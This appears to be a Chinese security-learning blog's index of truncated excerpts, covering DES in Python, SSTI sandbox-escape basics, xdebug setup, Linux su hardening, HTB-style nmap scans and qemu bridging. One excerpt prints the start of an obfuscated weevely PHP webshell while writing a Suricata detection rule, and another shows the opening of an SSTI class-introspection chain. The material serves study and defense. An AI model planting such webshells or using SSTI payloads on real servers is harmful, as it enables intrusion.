No title
2021.8.1 今日比较杂,终于搞定了pycharm,搞定了SSTI模板注入!在pycharm中学习一个函数比如DES.new(),可以按F4查看源码来了解函数。再按ctal F4来返回程序继续编辑。1234567from Cryptodome.Cipher import DESkey = b"123456ab";des = DES.new(key,DES.MODE_ECB);#创建对象,选择加密模式#加密en_data = des.encrypt("爬虫nb".encode());print(en_data);
这是练习的DES,注意,一个汉字算三个字节,明文必须为密钥整数倍,密钥为8位,明文正好也为8位。
加密出来就是如此。下面解密。
解密完成,记得第一步解密无法表示汉字,要经过utf-8转码。
下面攻关一项重大知识点:SSTI模板注入先学习python沙盒绕过
估计你已经看懂了,
12().__class__应该返回()对应的类名称,也就是元组,由图,返回了tuple().__class__.__bases__返回元组下的基类,也就 ...
No title
2021.8.1 今日比较杂,终于搞定了pycharm,搞定了SSTI模板注入!在pycharm中学习一个函数比如DES.new(),可以按F4查看源码来了解函数。再按ctal F4来返回程序继续编辑。1234567from Cryptodome.Cipher import DESkey = b"123456ab";des = DES.new(key,DES.MODE_ECB);#创建对象,选择加密模式#加密en_data = des.encrypt("爬虫nb".encode());print(en_data);
这是练习的DES,注意,一个汉字算三个字节,明文必须为密钥整数倍,密钥为8位,明文正好也为8位。
加密出来就是如此。下面解密。
解密完成,记得第一步解密无法表示汉字,要经过utf-8转码。
下面攻关一项重大知识点:SSTI模板注入先学习python沙盒绕过
估计你已经看懂了,
12().__class__应该返回()对应的类名称,也就是元组,由图,返回了tuple().__class__.__bases__返回元组下的基类,也就是 ...
php配置xdebug
我们首先安装pecl与pear,这是php的插件程序,有助于我们对xdebug的安装,
然后我们安装xdebug,我们要选择合适我们php配置的xebug,我们打开匹配地址 :https://xdebug.org/wizard.php
我们要将php -i的全部信息放入此网站中获取合适的xdebug。
然后配置php.ini
向文件末尾添加:
1234567[xdebug]zend_extension = /usr/lib/php/extensions/no-debug-non-zts-20121212/xdebug.so //这是配置xdebugxdebug.remote_enable = On //是否运行远程终端,必须开启xdebug.remote_handler = "dbgp"xdebug.remote_host = "localhost"xdebug.remote_port = 9001 //这个端口号要和phpstorm中的保持一致,示例的端口是9001xdebug.idekey = PHPSTROM //调试器关键字
linux用户权限管理
一般情况下,不建议直接使用 root 用户登录,一是减少因操作失误而造成的破坏;二是降低特权密码被泄露的风险。鉴于这些原因,需要为普通用户提供一种身份切换或权限提升机制,以进行管理任务。
(1)su命令——切换用户默认所有用户允许使用 su 命令,从而有机会反复尝试其他用户(root)的登陆密码,带来安全风险。可以使用 pam_wheel认证模块,只允许极个别用户使用 su 命令进行切换。
123456[root@localhost ~]# vim /etc/pam.d/suauth required pam_wheel.so use_uid //这行去掉注释 # [root@localhost ~]# su - ysf[ysf@localhost ~]$ su - root //再次尝试切换,就会提示密码错误密码:su: 密码不正确
上述情况我们在平时也会遇到,可能sudo命令可以输入用户密码后使用,但是不能通过密码进入root用户。
我们需要用sudo的权限添加用户到wheel组。
12345678[root@loc ...
suricata规则的编写
下面我们来写一下针对weevely4.0.1版本产生木马的拦截规则,首先我们通过抓包发现,在连接木马时不会通过网络层发包,只有连接成功后,执行指令时,才会通过网络层,应用层,看到TCP和HTTP请求和响应。所以我们只能针对其连接成功后执行的恶意指令执行匹配和拦截。
我们用通用正则表达式对木马进行匹配,先查看木马文件
weevely产生的PHP木马格式123456789101112<?php$s='@x(@base6Vr4_decode($m[1])Vr,$k)))VrVr;$o=@ob_geVrtVr_conteVrnts();@Vrob_end_cleVraVr';$B='$k="e10aVrdc39";Vr$kh="4Vr9baVr59abVrbe56"Vr;$kf="eVr057f20f883VrVre";$Vrp="ZwNqIe';$K='ents("VrpVrhp://inpVrut"),Vr$m)==1) {@oVrb_ ...
Crocofile 靶机打ftp协议
先进行nmap扫描
两种方式
1234567891011121314151617181920212223242526272829303132333435┌──(spencer㉿kali)-[~/桌面]└─$ sudo nmap -sC 10.129.237.84 -Pn -n --openStarting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 17:25 CSTStats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 84.81% done; ETC: 17:25 (0:00:00 remaining)Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 87.76% done; ETC: 17:26 (0:00:01 remaining)Stats: 0:00:14 elapsed ...
windows漏洞
我们刚才说了一种扫描方式
1sudo nmap -sS -Pn -n --open ip地址
结果发现有些没有扫描出来,被过滤了,我们尝试第二种
1234-p- : This flag scans for all TCP ports ranging from 0-65535-sV : Attempts to determine the version of the service running on a port--min-rate : This is used to specify the minimum number of packets Nmap should send persecond; it speeds up the scan as the number goes higher
1sudo nmap -p- --min-rate 5000 -sV ip地址
扫描确实加快了,非常详细
1234567891011121314151617181920┌──(spencer㉿kali)-[~/桌面]└─$ sudo nmap -p- --min-rate 5000 -sV 10 ...
brctl使用方法
什么是brctlbrctl 用来管理以太网桥,在内核中建立、维护、检查网桥配置。一个网桥一般用来连接多个不同的网络,这样这些不同的网络就可以像一个网络那样进行通讯。
网桥是一种在链路层实现中继,对帧进行转发的技术,根据MAC分区块,可隔离碰撞,将网络的多个网段在数据链路层连接起来的网络设备。网桥工作在数据链路层,将两个LAN连起来,根据MAC地址来转发帧,可以看作一个“底层的路由器”。
在网桥上每个以太网连接可以对应到一个物理接口,这些以太网接口组合成一个大的逻辑的接口,这个逻辑接口对应于桥接网络。————————————————版权声明:本文为CSDN博主「Lee木木」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_44983653/article/details/103138223
安装 bridge-utils1yum info bridge-utils
brctl命令详解1234567891011121314151617181920[riscv@fedora-riscv ~]$ ...
linux命令之uname
-s, —kernel-name 输出内核名称 -n, —nodename 输出网络节点上的主机名 -r, —kernel-release 输出内核发行号 -v, —kernel-version 输出内核版本 -m, —machine 输出主机的硬件架构名称 -p, —processor 输出处理器类型或”unknown” -i, —hardware-platform 输出硬件平台或”unknown” -o, —operating-system 输出操作系统名称
qemu模拟的riscv ubuntu实现桥接
qemu模拟的riscv ubuntu实现桥接1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859sudo brctl addbr br0cat /etc/qemu/bridge.conf 确认allow br0sudo chmod u+s /usr/lib/qemu/qemu-bridge-helpersudo brctl addif br0 ubuntu网卡qemu-system-riscv64 -machine virt \ -nographic \ -smp 4 \ -m 8G \ -bios Fedora-Developer-Rawhide-${VER}-fw_payload-uboot-qemu-virt-smode.elf \ ...